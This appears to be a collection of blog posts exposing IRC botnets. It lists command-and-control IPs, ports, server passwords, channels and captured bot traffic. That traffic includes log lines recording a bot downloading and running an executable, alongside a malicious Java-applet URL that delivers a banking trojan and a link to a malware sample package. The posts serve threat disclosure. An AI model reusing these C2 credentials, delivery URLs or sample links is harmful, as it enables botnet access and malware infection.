The method here is this: the Spanish or Brazilian hacker uses a Java applet to download and execute his banker on remote computers. The malicious URL is this: http://pics24.fileave.com/ To find out how the banker is downloaded and executed, you have to download the index.html file via wget for Windows: http://users.ugent.be/~bpuype/wget/#usage After downloading the index.html...
75.102.22.40 (IRC botnet hosted in United States, Chicago, Hostforweb Inc)
Remote Host    Port Number
204.0.5.51 80
216.178.38.224 80
216.178.39.11 80
66.220.149.11 80
75.102.22.40 2866 PASS xxx (IRC communication)
NICK NEW-[USA|00|P|74212]
USER XP-9076 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|74212] -ix
JOIN #!nine! test
PONG 22
MOTD
Hosting info: http://whois.domaintools.com/75.102.22.40
dl.ka3ek.com (IRC botnet hosted in China, Beijing, Chinanet Jiangxi Province Network)
Remote Host    Port Number
dl.ka3ek.com 3321 PASS eee
Resolved : [dl.ka3ek.com] To [59.53.91.167]
Resolved : [dl.ka3ek.com] To [60.190.218.104]
PASS eee
KCIK qkrcdlij
rssr pjvknyue "" "vxs" :pjvknyue
PRIVMSG #dpi :Done.
Hosting info: http://whois.domaintools.com/59.53.91.167
208.98.26.140 (IRC botnet hosted in United States, Morgantown, Sharktech Internet Services)
Remote Host    Port Number
208.98.26.140 3211 PASS google_cache2.tmp
NICK n[DvLz-USA|XP]757134
USER 7571 "" "TsGh" :7571
PONG :2ECEF3B6
JOIN #DvLz DvLz#
PONG :Irc.D3v1Lz.Com
Hosting info: http://whois.domaintools.com/208.98.26.140
46.21.169.42 (IRC botnet hosted in Netherlands, Amsterdam, Denkers Ict – Ipv4 Infrastructure)
Remote Host    Port Number
46.21.169.42 6567 PASS s1m0n3t4
70.38.98.239 80
The data identified by the following URL was then requested from the remote web server:
http://img105.herosh.com/2011/05/13/348778130.gif
MODE [SI|USA|00|P|75060] -ix
JOIN #mot# c1rc0dusoleil
PRIVMSG #mot# :[Dl]: File download: 80.0KB to: c:\WINDOWS\jds.exe @ 80.0KB/sec.
PRIVMSG #mot# :[Dl]: Created process: "c:\WINDOWS\jds.exe", PID:
PONG Apple.Network
NICK [SI|USA|00|P|75060]
mecanto571.dyndns.org (IRC botnet hosted in Germany, Hetzner Online Ag)
Resolved : [mecanto571.dyndns.org] To [178.63.252.56]
Remote Host    Port Number
178.63.252.56 26745 PASS google_cache2.tmp or PASS serverpass
64.186.152.219 26745 PASS google_cache2.tmp or PASS serverpass
64.62.181.43 80
Invisible Users: 1417
Channels: 1 channels formed
Clients: I have 1418 clients and 0 servers
Local users: Current Local Users: 1418 Max: 4139
Global users: Current Global Users: 1418 Max: 1677
New Domain Name For The Blog
Hi everyone. From today the blog will have a new address, this one: www.exposedbotnets.com The name is closer to the content. Have fun and see you later.
28mb malware samples
Here is another package. Have fun searching inside for bankers, RATs, IRC bots, etc. Download: http://a3059876.goneviral.com
184.22.249.48 (IRC botnet hosted in United States, Scranton, Network Operations Center Inc)
Remote Host    Port Number
184.22.249.48 5992 PASS none
NICK [3316|USA|XP|Z3R0x]
USER 3316 "" "lol" :3316
JOIN #unauthorized none
UPDATE:
Remote Host    Port Number
184.22.249.48 888 PASS none
NICK n-055786
USER pzqbzki 0 0 :n-055786
JOIN #slinky jack123
USERHOST n-055786
MODE n-055786 -x+B
Hosting info: http://whois.domaintools.com/184.22.249.48
46.166.131.252 (IRC botnet hosted in Luxembourg, Santrex Internet Services)
Remote Host    Port Number
213.251.170.52 80
46.166.131.252 4723 PASS ngrBot
NICK n{US|XPa}uysbxut
USER uysbxut 0 0 :uysbxut
JOIN #ngrBot Access
Hosting info: http://whois.domaintools.com/46.166.131.252